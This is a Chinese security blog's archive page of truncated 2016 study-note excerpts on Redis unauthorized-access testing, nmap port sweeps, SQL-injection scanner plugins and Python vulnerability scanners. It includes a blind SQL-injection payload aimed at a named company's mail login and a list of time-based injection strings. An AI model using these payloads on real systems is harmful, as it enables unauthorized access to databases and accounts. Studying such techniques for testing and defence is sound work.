kali linux安装redis 及使用客户端命令 redis-cli -h

kali linux安装redis 及使用客户端命令 redis-cli -h
本文主要是为了利用kali linux2.0 测试redis未授权访问。并非非常非常详细讲redis如何安装及设置。 首先,你需要下载最新的redis,例如我下载的就是稳定版,非最新版。地址:http://download.redis.io/releases/redis-3.0.7.tar.gz 然后你随意解压到哪个目录,然后在那个目录打开终端。直接输入命令:make 安装。安装完后,你需要进入SRC文件夹,然后输入下面的命令:cp red...
2016年04月11日 学习笔记 暂无评论 喜欢 2 阅读 9,548 views 次 阅读全文

nmap 扫描输出格式 IP:端口 txt

nmap 扫描输出格式 IP:端口 txt
nmap -vv -p 80,873,1433,1521,3306,2601,6379,7001,7002,7071,8000,8001,8002,8069,8080,8081,8888,9200,9300,9043,9080,11211,27017 127.0.0.1/24 | grep "Discovered open port" | awk {'print $6":"$4'} | awk -F/ {'print $1'} > output.txt   nmap -vv -iL yuming.txt /24  | grep "Discovered open port" | awk {'print $6":"$4'} | awk -F/ {'print $1'} &g...
2016年04月06日 学习笔记 暂无评论 喜欢 0 阅读 14,551 views 次 阅读全文

虚拟机 kali linux – 桥接、NAT、仅主机都上不了网解决方法

虚拟机 kali linux – 桥接、NAT、仅主机都上不了网解决方法
唉,无奈自己是个小白,电脑安装完最新版本的java之后,发现虚拟机里面的kali linux 2.0就无法上网了,始终就没弄明白到底怎么弄的呢?!安装一个JAVA跟虚拟机有毛毛关系喂猫就上不了网了?! 最后本人删除虚拟机,从新做系统,也白费!!!最后本人给出如下答案。 首先看如,设置: 设置虚拟机联网方式 然后进入kali linux2.0系统里面的网络设置,看图: kali linux2.0网络...
2016年04月01日 学习笔记 暂无评论 喜欢 0 阅读 9,708 views 次 阅读全文

密码保护:TangScan-master 日本jp某通用程序SQL注入插件–‘盲注延时判断’

密码保护:TangScan-master 日本jp某通用程序SQL注入插件–‘盲注延时判断’
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 11...
2016年03月31日 学习笔记 要查看留言请输入您的密码。 喜欢 0 阅读 3,549 views 次 阅读全文

TangScan-master 日本jp某通用程序SQL注入插件–‘盲注判断字符’

TangScan-master 日本jp某通用程序SQL注入插件–‘盲注判断字符’
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 11...
2016年03月31日 学习笔记 暂无评论 喜欢 0 阅读 3,487 views 次 阅读全文

几款python漏洞扫描工具

几款python漏洞扫描工具
中间件漏洞检测框架(F-MiddlewareScan) 纯python编写的轻量级中间件漏洞检测框架,实现针对中间件的自动化检测,端口探测->中间件识别->漏洞检测->获取webshell 参数说明 -h 必须输入的参数,支持ip(192.168.1.1),ip段(192.168.1),ip范围指定(192.168.1.1-192.168.1.254),最多限制一次可扫描65535个IP。 -p 指定要扫描端口列表,多个端口使用,隔开 例如:7001,8080,9...
2016年03月30日 学习笔记 暂无评论 喜欢 1 阅读 9,975 views 次 阅读全文

密码保护:某行业关键词3个月百度排第一数据分析

密码保护:某行业关键词3个月百度排第一数据分析
【第一点】:访客数(UV)、IP数相同。 【第二点】:IP数、访问次数相同。 【第三点】:ip与PV的对比 ip与PV的对比 【第三点】:新访客数与新访客比率 新访客数与新访客比率 【第三点】:平均访问时长与平均访问页数 平均访问时长与平均访问页数 【第四点】:ip数与新访客比率 ip数与新访客比率 【第五点】:ip数与平均访问页数 ip数与平均访问页数 【第六点】:ip与平均访问...
2016年03月27日 学习笔记 要查看留言请输入您的密码。 喜欢 0 阅读 3,352 views 次 阅读全文

密码保护:WooYun→lijiejie→漏洞利用方式总结(入侵技术总结)

密码保护:WooYun→lijiejie→漏洞利用方式总结(入侵技术总结)
一、首先是一个JD的漏洞。如下 1 2 3 POST https://mail.jd.com/Erpout/Logon.aspx //页面源码为UTF-8   captcha=test&destination=https://mail.jd.com/owa/&flags=0&forcedownlevel=0&isflag=0&isUtf8=1&maindo=mail.jd.com&showCheck=0&trusted=4&txtPassword=test&txtUser=aaaa'XOR(if(ascii(mid(user(),1,1))=106%2cben...
2016年03月08日 学习笔记 要查看留言请输入您的密码。 喜欢 0 阅读 3,009 views 次 阅读全文

mysql注入常用函数意义意思讲解

mysql注入常用函数意义意思讲解
常用注入语句: if(left(db_name(),1)='d')waitfor/**/dalay/**/'0:0:2'/**/-- or if(length(database())-8,benchmark(4000000,sha1(1)),1) (select(0)from(select(sleep(2)))v) Client-IP: * 注射,。 X-FORWARDED-FOR: * 注射,。 //介绍几个常用函数,都是MYSQL 查询中的使用意义: 1. version()——MySQL版本 2. user()——用户名 3. database()——数据库名 4. @@datadir——...
2016年03月08日 学习笔记 暂无评论 喜欢 0 阅读 4,603 views 次 阅读全文